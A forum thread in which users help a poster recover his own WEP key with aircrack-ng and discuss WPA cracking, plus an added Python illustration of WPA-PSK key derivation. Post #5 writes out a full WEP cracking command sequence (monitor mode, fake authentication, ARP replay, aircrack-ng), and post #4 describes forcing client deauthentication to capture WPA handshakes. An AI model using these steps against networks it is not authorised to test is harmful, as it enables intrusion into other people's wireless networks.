Thread: aircrack-ng usage help

  1. #1
    Join Date
    Apr 2008
    Beans
    25

    aircrack-ng usage help

    Hi,
    I am able to use aircrack-ng, but packet injection does not work.
    I just wanted to know if there is a way to recover a password.
    The WEP key for the password is stored in Vista and I can't recover it from there.
    However, it is a 10 digit numeric password generated by the WEP router, and I remember the first 5 digits of it but not the remaining ones.

    Is it possible to somehow pass the first 5 digits as a parameter to the aircrack-ng program while cracking, to reduce the cracking time and, more importantly, the number of data IVs that are needed for the crack? It takes more than 4 hours just to get 1000 data IVs because packet injection does not work on my box, and according to the guide it takes more than 10000 for a crack to work.

    Simply put, is there any way to allow aircrack-ng to take the first 5 digits as is and crack the remaining password by applying brute force, etc.?

  2. #2
    Join Date
    Apr 2007
    Beans
    37

    Re: aircrack-ng usage help

    Not that I know of. If there was a way, brute force would still take too long. You should try to apply a driver patch for your card and compile it so you can get injection. Then you can get the key in 15 minutes.

  3. #3
    Join Date
    Apr 2008
    Beans
    25

    Re: aircrack-ng usage help

    Thanks, I remembered the other 5 digits too.
    But can someone tell me the appropriate way to crack WPA passwords too? I assume WPA only uses some sort of brute force.

  4. #4
    Join Date
    Dec 2007
    Beans
    156

    Re: aircrack-ng usage help

    WPA cracking is shorter in a way, but it's less likely that you'll crack it. You need to catch what is known as a WPA 4-way authentication handshake, which is sent when a client connects to the access point. You can use aireplay's deauthentication feature to make an already connected client disassociate and reconnect, and use airodump to capture the handshake.

    From there, only a dictionary attack works, so if they have a very strong password it's unlikely that you'll be able to crack it. I hear there is some new development in this area that uses rainbow tables, but I'm not exactly sure how that works.

    You can find a full guide to cracking WPA networks on the aircrack-ng suite wiki.
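
    As an added, defender-oriented illustration (not part of this thread or of the aircrack-ng suite): the WPA-PSK derivation that post #4's dictionary attack has to repeat for every guess, showing why the SSID acts as a salt (so any precomputed table only works for one SSID, and a non-default SSID defeats it) and why each guess is expensive compared with WEP. Uses only the Python standard library; the "linksys" SSID and the candidate passphrases are constructed values.

```python
"""WPA-PSK passphrase-to-PMK derivation as specified in IEEE 802.11i.
Added example for this thread; it is not code from the original post."""
import hashlib
import time

PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i standard
PMK_LEN = 32               # 256-bit Pairwise Master Key


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_LEN)


def ssid_is_salt(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """Same passphrase, different SSID -> different PMK.  A rainbow table built
    for one SSID therefore says nothing about a network with another SSID."""
    return wpa_pmk(passphrase, ssid_a) != wpa_pmk(passphrase, ssid_b)


def guesses_per_second(ssid: str, samples: int = 20) -> float:
    """Rough per-guess cost on this machine: every candidate passphrase needs a
    full PBKDF2 run (about 8192 HMAC-SHA1 calls), which is why a long random
    passphrase is out of reach for a dictionary attack while WEP is not."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"candidate{i}", ssid)   # constructed sample guesses
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    # Test vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE"
    print(wpa_pmk("password", "IEEE").hex())
    print("SSID acts as salt:", ssid_is_salt("password", "IEEE", "linksys"))
    print(f"~{guesses_per_second('IEEE'):.0f} guesses/s, single-threaded")
```

    The first line printed matches the standard's published vector; the last line is the number a defender should compare against the size of the passphrase space they chose.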

  5. #5
    Join Date
    Sep 2009
    Beans
    21
    Distro
    Ubuntu Studio 9.04 Jaunty Jackalope

    Re: aircrack-ng usage help

    Quote:
    Is it possible to somehow pass the first 5 digits while cracking as a parameter to the aircrack-ng program to reduce the cracking time and more importantly the no of data IVs that are needed to crack the program? It takes more than 4 hours just to get 1000 data IVs because packet injection does not work on my box and according to the guide it takes more than 10000 for a crack to work.

    Simply put is there any way to allow aircrack-ng to take the first 5 digits as is and crack the remaining password by applying brute force etc.

    Simply put, no, you can't have it pass the first 5 digits. If it truly is your wireless network you can use Cain and Abel (google it) and it will recover the WEP key if you haven't formatted since you used the key. If that's not an option you can use BackTrack 3, in which case you need to flood the router with packets and trick it into sending back IVs even though you're not connected to it; then you use aircrack-ng to crack it once you have enough IVs (and that number would be around 50k to 100k IVs).
    This is a simple penetration test I did on my own company router to show how insecure WEP really is.

    # = comments
    Code:
        airmon-ng                          # shows adapters
        airmon-ng stop ath0                # stops the ath0 adapter
        ifconfig wifi0 down
        *leaving out specific part on purpose*
        airmon-ng start wifi0
        # the above steps basically set the wireless card into monitor mode
        # check to see if yours supports packet injection and monitor mode
        # if it doesn't, quit right there or buy a new card that does
        airodump-ng ath0                   # shows a list of wireless networks; it will update until you hit ctrl-c
        # when you see your network, type
        airodump-ng -c (channel i.e. 1 to 11) -w (filename i.e. wepkey) --bssid (bssid of your network) ath0
        # open a second console with the first one still running
        aireplay-ng -1 0 - (bssid) -h (MAC) ath0
        aireplay-ng -3 -b (bssid) -h (MAC) ath0
        # then in a third console, with the first and second still running,
        # after you've got enough IVs you use aircrack-ng; if it fails it will retry every 5000 IVs
        aircrack-ng -b (bssid) filename-01.cap
    ***EDIT*** Also, you can just go to your router page and disable the WEP key and re-enable it with another key, or better yet use WPA-PSK or TKIP.
    Your router page password isn't the same as your WEP key; if you never set one, google the default password, which is usually, believe it or not, PASSWORD :\

    hxleet
    Last edited by hxleet; September 29th, 2009 at 02:07 AM.
